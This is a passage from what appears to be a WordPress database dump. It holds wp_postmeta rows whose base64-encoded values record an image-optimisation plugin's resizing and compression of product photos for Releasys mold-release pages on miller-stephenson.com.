mFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODkwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk3OTIsImlkIjoxNDQ5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODkwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04OTAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg5MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0MSwidGltZSI6MTQ4MzU2OTc5NCwiaWQiOjE0NDl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04OTAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg5MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODkwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk3OTcsImlkIjoxNDQ5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODkwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04OTAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg5MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5ODAwLCJpZCI6MTQ0OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg5MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODkwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04OTAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTgwMiwiaWQiOjE0NDl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04OTAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg5MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODkwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk4MDUsImlkIjoxNDQ5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODkwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04OTAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg5MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5ODA4LCJpZCI6MTQ0OX1d'); 
INSERT INTO `wp_postmeta` VALUES (29458, 1448, 'wpfc_optimisation_reduction', '2261302'); 
INSERT INTO `wp_postmeta` VALUES (29459, 1448, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04ODAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UuanBnIiwicmVkdWN0aW9uIjoyMjYwODAwLCJ0aW1lIjoxNDgzNTY5ODE5LCJpZCI6IjE0NDgifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg4MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04ODAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTgyMSwiaWQiOjE0NDh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04ODAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg4MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5ODI0LCJpZCI6MTQ0OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04ODAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg4MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk4MjcsImlkIjoxNDQ4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg4MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg4MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04ODAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5ODMxLCJpZCI6MTQ0OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04ODAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg4MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk4MzQsImlkIjoxNDQ4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg4MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04ODAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTgzNiwiaWQiOjE0NDh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04ODAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg4MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5ODM5LCJpZCI6MTQ0OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04ODAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg4MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk4NDIsImlkIjoxNDQ4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04ODAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg4MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxOTksInRpbWUiOjE0ODM1Njk4NDQsImlkIjoxNDQ4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04ODAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg4MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxMzcsInRpbWUiOjE0ODM1Njk4NDcsImlkIjoxNDQ4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04ODAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg4MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxNTUsInRpbWUiOjE0ODM1Njk4NTAsImlkIjoxNDQ4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04ODAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg4MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5ODUyLCJpZCI6MTQ0OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg4MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04ODAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTg1NSwiaWQiOjE0NDh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04ODAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg4MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk4NTgsImlkIjoxNDQ4fV0='); 
INSERT INTO `wp_postmeta` VALUES (29460, 1447, 'wpfc_optimisation_reduction', '2310965'); 
INSERT INTO `wp_postmeta` VALUES (29461, 1447, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODUwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04NTAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODUwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UuanBnIiwicmVkdWN0aW9uIjoyMzEwNDc2LCJ0aW1lIjoxNDgzNTY5ODY5LCJpZCI6IjE0NDcifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg1MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODUwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY